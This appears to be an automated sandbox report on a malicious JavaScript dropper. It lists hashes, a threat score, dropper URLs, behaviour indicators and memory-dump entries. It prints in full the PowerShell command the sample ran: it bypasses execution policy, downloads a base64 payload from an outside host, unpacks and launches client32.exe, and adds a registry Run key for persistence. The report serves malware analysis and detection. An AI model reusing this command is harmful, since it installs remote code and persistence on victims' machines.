db599b0b7b3954b829dd48f70adf705f7a615b0e9192bb2c6cc769a6db8576e9

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
29-08-2023 08:21

Target

449644964496.js
Size

3KB
MD5

5be1f9c99ebc9bf6d9ed0f51c39adb51
SHA1

0961075f9d5e712d3be0c5a54ffc33fe182c6bb3
SHA256

db599b0b7b3954b829dd48f70adf705f7a615b0e9192bb2c6cc769a6db8576e9
SHA512

40ac746974f1b6a12a12ed6a5a6b405891cb46d42d71da3a477e99936efbd9aaffa318659ca87c55130f01d87f75a11d30737c063cfc7495de40058a3c3d694a

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://instalfrio.cl/destination.txt

exe.dropper

http://instalfrio.cl/destination.txt

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2864	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2864	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2864	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 2864	1292	wscript.exe	28
PID 1292 wrote to memory of 2864	1292	wscript.exe	28
PID 1292 wrote to memory of 2864	1292	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\449644964496.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864

memory/2864-4-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/2864-5-0x00000000025A0000-0x00000000025A8000-memory.dmp

Filesize
32KB

Download
memory/2864-6-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-7-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-8-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-9-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-10-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-11-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-12-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-13-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-14-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-15-0x00000000025C0000-0x0000000002640000-memory.dmp

Filesize
512KB

Download
memory/2864-16-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download